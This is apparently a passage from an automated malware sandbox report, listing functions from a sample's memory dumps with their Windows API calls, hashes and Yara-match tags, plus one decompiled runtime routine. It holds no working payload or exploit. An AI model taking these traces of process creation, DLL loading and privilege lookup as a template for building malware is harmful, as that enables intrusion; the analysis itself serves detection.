                                  • Opcode Fuzzy Hash: e42f135b1bf86386c5c3d7f41aebfc538b495ced4e1691fd485fa03a807888d8
                                  • Instruction Fuzzy Hash: 939002A134100446F22061594414B060005D7E5345F51C03DE10555A4D8659DC567166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fa58a9ea7d27bb649e054266c03b5815b89e2e669210cf878f68f5de5b9abfb4
                                  • Instruction ID: a66bb52d8059167851a82df7aa4dace64d3b0e92559b231d9871f75b2129f7b8
                                  • Opcode Fuzzy Hash: fa58a9ea7d27bb649e054266c03b5815b89e2e669210cf878f68f5de5b9abfb4
                                  • Instruction Fuzzy Hash: 6A90026121180046F32065694C14B07000597D4347F51C13DA01455A4CC955D8657561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00617300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 006173A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 09b6c9e9a7222ac9dfa50fda99bc66ac5838c667275f04f4cd5b0c0a53578890
                                  • Instruction ID: 6f1d928685c983d53232dcca327369ab50d333377a185b5e739047e5c6815d6f
                                  • Opcode Fuzzy Hash: 09b6c9e9a7222ac9dfa50fda99bc66ac5838c667275f04f4cd5b0c0a53578890
                                  • Instruction Fuzzy Hash: 473190B6506700ABC715EF64C8A1FE7B7F9AF88700F04811DFA199B241D730B986CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006172F7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 006173A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 7a8fe8aa750ece917929258db3b8876a4e8f126739e00d25dfa5636777b47152
                                  • Instruction ID: 3e3628eb4669de4a83171c662459439eea2e276e2c5037bfe003471fe35c0fe4
                                  • Opcode Fuzzy Hash: 7a8fe8aa750ece917929258db3b8876a4e8f126739e00d25dfa5636777b47152
                                  • Instruction Fuzzy Hash: 6F21A576505600ABC710DF64C8A1FEBBBB6BF88700F14811DFA199B241D770A595CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00618923, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00603B93), ref: 0061891D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: d62e800b08c4cc61464d52e6078d3c6050bf1d99bc0f7649bca3bd97df8f6a16
                                  • Instruction ID: 8bec6d8859b9312777ecd4eb2820a68a77a110d3f748d154437a457bd81c8a89
                                  • Opcode Fuzzy Hash: d62e800b08c4cc61464d52e6078d3c6050bf1d99bc0f7649bca3bd97df8f6a16
                                  • Instruction Fuzzy Hash: A601DE762042047FD721DF98DC96EE77759EF843A0F084495F94C9B242C930EA50CAF1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006188E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00603B93), ref: 0061891D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 8aaa531ffc0db079491aec3f70eed164a8d3963a6421d82781efd33be8240a16
                                  • Instruction ID: ffb0514748c954c2579699ab158e20a2787b829977048ad0d164d28902173702
                                  • Opcode Fuzzy Hash: 8aaa531ffc0db079491aec3f70eed164a8d3963a6421d82781efd33be8240a16
                                  • Instruction Fuzzy Hash: FDF0BEB62042146BCB15DF98DC49EE7779DEF88750F154999F9086B242C630E950CAF1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006188F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00603B93), ref: 0061891D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction ID: 363694fccc7a49ba6e1a44032f629936e6d1c64c8c6774095d49399ff7ec7659
                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction Fuzzy Hash: AAE012B1200208ABDB18EF99CC49EA777ADAF88750F018558FA085B242C630E910CAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(65a,?,00613CAF,00613CAF,?,00613536,?,?,?,?,?,00000000,00000000,?), ref: 006188DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: 65a
                                  • API String ID: 1279760036-1193530184
                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction ID: b628e34f2afa34b136727073969866547ea64c6a23e99b6a1df447d4dd6994f9
                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction Fuzzy Hash: A4E012B1200208ABDB14EF99CC45EA777ADAF88750F158558FA085B242C630F910CAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00607280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 006072DA
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 006072FB
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                  • Instruction ID: 90264de6e0b06469e3010609f39e11cd9c9adafd39ea5f8d6ed230ade87442ff
                                  • Opcode Fuzzy Hash: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                  • Instruction Fuzzy Hash: D0018F31A8022977E725AA949C03FFF766D5B40B51F150119FF04BA2C2EA946A0686FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00609B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00609BB2
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                  • Instruction ID: 84e07f0e3801c5c9c9fb5901d6ce0a3d997baa0993e3ec40bd9de6d6e3765952
                                  • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                  • Instruction Fuzzy Hash: 68015EB5E4020DBBDF14DAE0EC42FDEB37A9B54318F044199A90897281F670EB54CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006189B9, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 006189B4
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: c1ebe75da85cb51ebaa87378d775be1eb7b29cfb1eb12bd5ebb548284419c4f7
                                  • Instruction ID: f0bcea23958045f52005b5e9381939415daf5b22adae4ed6ec474bbb41bba19b
                                  • Opcode Fuzzy Hash: c1ebe75da85cb51ebaa87378d775be1eb7b29cfb1eb12bd5ebb548284419c4f7
                                  • Instruction Fuzzy Hash: FFF019B6200209AFCB14DF99DC80DEB73ADEF88350F008558FA0C97241C630E850CBB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00618960, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 006189B4
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction ID: 7d0620e1d494bf9ec0f345a8727884c6c54330c9b510c9cac3e0aa547a90e687
                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction Fuzzy Hash: 0B01B2B2214108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00617430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0060CCF0,?,?), ref: 0061746C
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                  • Instruction ID: d58f88ede2561600bde1cb2ab29d9f4c2efc52bb9bc5be78a8094b4727df3fe5
                                  • Opcode Fuzzy Hash: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                  • Instruction Fuzzy Hash: F7E092333803143AE33065A99C03FE7B79DCB81B60F58002AFA4DEB2C1D595F84142A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00618A43, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0060CFC2,0060CFC2,?,00000000,?,?), ref: 00618A80
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 53f92bad846a6b1da716cf1f8adb20bef664383476eccd7627fdd3ec78d023aa
                                  • Instruction ID: 1c89c3691aca3212592ca8f5fc9542cc1edf02ded3e30ca54160cb16fc3dea84
                                  • Opcode Fuzzy Hash: 53f92bad846a6b1da716cf1f8adb20bef664383476eccd7627fdd3ec78d023aa
                                  • Instruction Fuzzy Hash: D3E0E5751142906FCB11CB69DC45E973FA8DF45240F084599FD8857203C4309414C7B4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00618A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0060CFC2,0060CFC2,?,00000000,?,?), ref: 00618A80
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction ID: a1d0792977a7f21b19d89bffc35278106145376d79ba4375bf4c000105662759
                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction Fuzzy Hash: DAE01AB12002086BDB10DF49CC85EE737ADAF88750F018154FA0857241C930E950CBF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0060D427, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,00607C83,?), ref: 0060D45B
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: ea1625c1afe68924cefbdc675156c3ea6543a27b8c142bc8d2fba047ec369721
                                  • Instruction ID: 16d7d4891df043ed082329bef6ff29bad0c3d7b577815da352424241739a80a0
                                  • Opcode Fuzzy Hash: ea1625c1afe68924cefbdc675156c3ea6543a27b8c142bc8d2fba047ec369721
                                  • Instruction Fuzzy Hash: 80D02E21B803003AEB10FAE88C03F6A32896B00B60F4A0264FA199E3C3D920E94182A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0060D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,00607C83,?), ref: 0060D45B
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                  • Instruction ID: 46072bb733154f1a5f26a536cf98d5c6e64627862e6b871e15c76e1cf8dc3b80
                                  • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                  • Instruction Fuzzy Hash: 9BD05E657903042AE610AAA49C03F6632C95B45B40F494064FA49963C3D960E5008165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7beebc50de4413daa14683c9efa129a8de3f618a28052eeb4e6ca3b400425ab2
                                  • Instruction ID: f65e0e02420f05a32197d006dd4c8ec2b71d0776deaaee5169fc8ffff24f9806
                                  • Opcode Fuzzy Hash: 7beebc50de4413daa14683c9efa129a8de3f618a28052eeb4e6ca3b400425ab2
                                  • Instruction Fuzzy Hash: 9BB09BF19014C5C9F721D760460C717790077D4745F26C076D3520691A4778D095F5F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 0480FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E0480FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E047BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04805720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04805720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                  0x0480fdda
                                  0x0480fde2
                                  0x0480fde5
                                  0x0480fdec
                                  0x0480fdfa
                                  0x0480fdff
                                  0x0480fe0a
                                  0x0480fe0f
                                  0x0480fe17
                                  0x0480fe1e
                                  0x0480fe19
                                  0x0480fe19
                                  0x0480fe19
                                  0x0480fe20
                                  0x0480fe21
                                  0x0480fe22
                                  0x0480fe25
                                  0x0480fe40

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0480FDFA
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0480FE01
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0480FE2B
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: 2b6013a24939113a9f84e10660b631cca736ce3b118e2c28a28acf2057343fa1
                                  • Instruction ID: af2c8a7edee742cbb19128777e0ed0d10c0408d4341bd7134745e4c557d07e29
                                  • Opcode Fuzzy Hash: 2b6013a24939113a9f84e10660b631cca736ce3b118e2c28a28acf2057343fa1
                                  • Instruction Fuzzy Hash: E0F0FC72600101BFE6601A55DC06F237B5AEB44730F148714F718951D1EAA2F8209AF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%